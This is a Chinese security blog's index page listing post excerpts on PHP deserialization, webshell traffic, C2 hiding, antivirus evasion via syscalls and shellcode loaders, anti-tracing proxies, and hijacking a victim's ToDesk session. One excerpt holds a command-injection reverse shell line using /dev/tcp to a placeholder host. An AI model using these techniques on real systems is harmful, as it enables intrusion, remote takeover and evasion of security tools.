小新07 - 博客园

[置顶] PHP反序列化总结

摘要： 0x01.前言本文首发于先知：https://xz.aliyun.com/t/12507。花些时间把四种常见的php反序列化总结了一遍，各自都找了简单示例和例题，参考了一些师傅的链接加上自己的理解，参考链接放在文末 0x02.反序列化是什么说到反序列化，经常会想到serialize()，uns 阅读全文

posted @ 2024-03-14 19:21 小新07 阅读(62) 评论(0) 推荐(0) 编辑

[置顶] 滴水逆向笔记系列-前言

摘要：这个系列记录了我学习滴水逆向课程的所有笔记，所以只记录我认为需要总结的知识点，搭配b站滴水逆向三期课程食用更佳。之前一直学习的是web安全方向，对二进制了解较少，所以笔记不当之处，请各位师傅批评指正，望包容。阅读全文

posted @ 2024-03-14 10:26 小新07 阅读(158) 评论(0) 推荐(0) 编辑

2024年7月10日

常见webshell管理工具流量分析

摘要： 1.蚁剑蚁剑设置代理后bp抓包，bp看流量方便一点默认编码器流量分析进入文件管理器的两个数据包：解码后的数据为： 7=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};f 阅读全文

posted @ 2024-07-10 15:46 小新07 阅读(6) 评论(0) 推荐(0) 编辑

2024年6月6日

反弹shell不成功排查

摘要：反弹不成功排查今天遇到shell反弹不成功的问题，顺便记下来 0.低权限环境 /tmp写入bash反弹脚本执行 127.0.0.1| Echo ‘bash -i >& /dev/tcp/x.x.x.x/7777 0>&1’>/tmp/1.sh 127.0.0.1|bash /tmp/1.sh ph 阅读全文

posted @ 2024-06-06 18:23 小新07 阅读(17) 评论(0) 推荐(1) 编辑

2024年5月21日

c2隐藏&流量加密

摘要： c2隐藏&流量加密参考链接参考文章: https://webxxe.cn/index.php/archives/238/ c2profile随机生成脚本： https://github.com/threatexpress/random_c2_profile https://github.com/ 阅读全文

posted @ 2024-05-21 11:18 小新07 阅读(62) 评论(0) 推荐(0) 编辑

2024年4月21日

todesk利用上线

摘要：翻出todesk的配置文件config.ini 看到clientId就是设备代码，tempAuthPassEx就是临时密码加密后，我们把受害机的tempAuthPassEx复制到本机的todesk配置文件，保存后，重新打开todesk 注意：更新频率得改成手动重新打开todesk就会发现我们的临时阅读全文

posted @ 2024-04-21 10:42 小新07 阅读(33) 评论(0) 推荐(0) 编辑

proxifier+v2代理软件实现真全局代理（防溯源）

摘要： v2的使用这里就不详细说了打开v2，右下角可以看到端口开启v2代理后，打开proxifer 先打开左上角的代理服务器按照以下配置，端口改成v2上面看到的socks5端口也可以左下角检查以下代理有没有问题，有时候可能是代理服务器卡了或者死了接着来到代理规则，按照以下配置阅读全文

posted @ 2024-04-21 10:23 小新07 阅读(194) 评论(0) 推荐(0) 编辑

2024年4月6日

免杀-syscall

摘要： 3x3 syscall 我们windows api的调用，通过层层调用最终还是会进入ntdll的底层函数的调用，再通过syscall快速调用进入0环实现的代码，下面我将记录一些syscall的底层基础知识，最后的代码实现是通过现成项目直接快速调用敏感api，这种现成syscall的项目很多，但是感觉阅读全文

posted @ 2024-04-06 22:16 小新07 阅读(242) 评论(0) 推荐(0) 编辑

免杀-异常处理_内存波动修改

摘要： 3x1 远程分段加载shellcode+windows异常处理 windows异常处理机制利用原理的文章：https://forum.butian.net/share/783 异常处理的个人简单理解：我们在上线cs后，cs是默认设置了60秒睡眠的，也就是心跳包机制，这10秒内我们的代码将会被sle 阅读全文

posted @ 2024-04-06 22:08 小新07 阅读(113) 评论(0) 推荐(0) 编辑

免杀-内存中的加解密

摘要： 3x0 内存中的加解密 3x0x0 SystemFunction032 SystemFunction032：一个系统函数，可以做到在内存中加解密,调用也很方便或者沿着这个思路我们可以找找其他在内存中加解密的方法加密代码： #include <windows.h> #include <stdio. 阅读全文

posted @ 2024-04-06 22:07 小新07 阅读(134) 评论(0) 推荐(0) 编辑

免杀-静态绕过总结

摘要： 2.静态绕过 2x0 远程分段加载shellcode 我最经常使用的一种静态绕过的方法效果：能过火绒360动静态，但是一些添加用户的命令依然会拦截加上隐藏窗口360免不了，火绒还是可以 #include <winsock2.h> #include <ws2tcpip.h> #include < 阅读全文

posted @ 2024-04-06 22:05 小新07 阅读(131) 评论(0) 推荐(0) 编辑

免杀杂谈

摘要： 0.零散知识 0x00 添加图标：尝试了几种大众方法，感觉还是这篇文章的方法好用 https://www.sqlsec.com/2020/10/csexe.html#%E6%B7%BB%E5%8A%A0%E5%9B%BE%E6%A0%87 0x01 添加签名： sigthief下载地址：https 阅读全文

posted @ 2024-04-06 22:02 小新07 阅读(93) 评论(0) 推荐(0) 编辑

xiaoxin07